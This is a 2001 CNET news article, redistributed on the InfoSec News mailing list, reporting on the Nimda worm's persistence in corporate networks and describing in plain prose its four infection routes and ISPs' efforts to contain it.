New studies reveal Nimda's tenacity

[InfoSec News <isn () c4i org>]

http://news.cnet.com/news/0-1003-200-7250546.html

By Robert Lemos
Special to CNET News.com 
September 21, 2001, 1:20 p.m. PT 

Nimda's number may not be up.

Security consultants stressed Friday that while the spread of the
disruptive Nimda worm has slowed, many companies are having
difficulties rousting the malicious program from their networks.

"It's an awfully insidious little bastard," said Mike Scher, senior
research consultant with network-protection company Neohapsis. "You
clean it off of one segment of the network and have to make sure it
doesn't come back. It's almost like fighting a fire."

After successfully preventing Nimda from entering its network, Scher's
client--a Forture 500 company--picked up the worm from an employee
working from home. After that, the program spread quickly throughout
the corporation's worldwide offices.

"This is a huge organization, so there are lots of infections," said
Scher, who had been working 48 hours to clean the digital infestation
from the network. "It's a terrible pain to get off."

The tenacious worm also caused several Internet service providers to
take drastic steps to block customers from spreading the worm and
overloading their networks with traffic.

XO Communications acknowledged on Friday that the company severed
almost a quarter of its customers' Web servers from the Internet in an
attempt to halt the deluge of data produced by the worm.

"Many of our customers are small businesses," XO spokeswoman Jenna Dee
said. "They bring in an IT person to set up their network and don't
have a full-time technical employee. Those types of businesses are the
most susceptible to these attacks."

Another Internet service provider, DSL.net, completely cut off
hundreds of its customers after it became apparent that their
computers had been infected by the worm, according to customers'
reports. DSL.net did not immediately respond to requests for comment.

The Nimda worm hit so quickly--peaking within 6 hours--and caused so
much havoc that accurate analysis of the worm has been delayed.

For example, earlier this week, antivirus software company Symantec
originally classified removal of the Nimda worm as "easy," but 24
hours later it changed that evaluation.

The latest information shows that the Nimda worm's extensive
replacement of key files and programs on infected PCs and its use of
Windows file sharing to spread across local area networks have made it
difficult to clean out.

Nimda--which is "admin," the shortened form of "system administrator,"
spelled backwards--started spreading early Tuesday morning and quickly
infected PCs and servers across the Internet. Also known as
"readme.exe" and "W32.Nimda," the worm is the first to use four
different methods to infect not only PCs running Windows 95, 98, Me
and 2000, but also servers running Windows 2000 and Windows NT.

The worm spreads by four different routes. Microsoft has posted an
extensive list of patches and advisories to combat the worm.

The worm originally spread quickly by broadly scanning local networks
and the Internet for Web servers running Microsoft's Internet
Information Server software that were vulnerable to one of two
well-known flaws.

First, if the server had already been compromised by the Code Red II
worm, then Nimda used that backdoor to copy itself to the server as a
file named "admin.dll." For all other IIS servers, the program
attempted to use the "Web server folder traversal" vulnerability
discovered in October 2000 to copy the file "admin.dll" to the server.

Once the file is copied to the computer, the worm executes it and
infects the new victim. On such servers, the worm creates a "guest"
account with administrative privileges, copies itself to any network
drives, makes the C: drive publicly accessible, and appends a script
to HTM, HTML and ASP files.

The files will attempt to upload a copy of the worm to the computer of
anyone who views a Web page hosted by the infected computer using a
browser with JavaScript enabled. The worm also deletes the keys in the
registry that set the security preferences for the computer and also
causes itself to be run at start-up.

The ability to infect others through viewing a Web page is the Nimda
worm's second path of infection.

The snippet of JavaScript added to each Web file on an infected server
will cause the worm, renamed "readme.eml," to upload from the server
to the surfer's computer. The worm will run automatically on PCs using
unpatched versions of Microsoft's Internet Explorer 5.5 SP1 or
earlier. On any browser with JavaScript enabled, the worm's script
will cause the browser to try to upload the code but will first ask
the PC user's permission.

PCs can also be infected through the worm's third mode of
transmission: e-mail.

On infected computers, the Nimda worm runs its own mail service and
sends e-mail to addresses in Windows address book as well as to those
culled from the machine's browser cache, which stores elements of
recently viewed Web pages.

The e-mail appears to have an attached WAV file, but in reality it
uses an old MIME (multipurpose Internet mail extensions) vulnerability
to automatically run the worm once the e-mail is viewed in the mail
client's preview plane.

Even on computers that are not vulnerable to the security flaw, the
attachment causes the Outlook and Outlook Express e-mail programs to
open a dialog box asking the user for permission to open the file.

If the worm infects a PC through either the Web browser or e-mail,
Nimda acts much like it does on servers. In addition, the worm adds a
"load.exe" file to the Windows System directory, appends itself to
many .exe, .eml and Word document files, and replaces common
applications such as WordPad, WinZip32 and HyperTerminal with a copy
that executes the worm.

In addition, the worm places copies of "Riched20.dll"--the program
that is the workhorse text editor for Word, WordPad and other editing
programs--in multiple places on every accessible hard drive. Whenever
a program that uses Riched20.dll opens, that also executes the worm.

This ability to spread copies of itself throughout corporate networks
by using shared drives is the fourth way the worm infects.

Using the network-sharing mechanism, the Nimda worm spreads fast and
makes extermination very difficult, said Vincent Gullotto, director of
security software maker Network Associates' antivirus emergency
response team.

"While you are cleaning one area of the network, it is coming back
behind you and reinfecting the computers," he said.

Network Associates, Symantec and other security companies have tools
to help system administrators clean their systems.

Yet even if companies do completely eradicate the worm from their
networks, Nimda will be out there for a long time, said Jensenne
Roculan, incident analyst for SecurityFocus.com's ARIS Incident
Analysis Team. Roculan pointed out that Code Red and its variant still
account for some 30,000 infections worldwide.

"Code Red is still going strong because of the number of unpatched
systems on the Web," she said. "If that is any indication, Nimda
should be around for a while."

Analyses of the Nimda worm can be found at CERT, SecurityFocus.com,
Neohapsis and most antivirus companies' Web sites.



-
ISN is currently hosted by Attrition.org

To unsubscribe email majordomo () attrition org with 'unsubscribe isn' in the BODY
of the mail.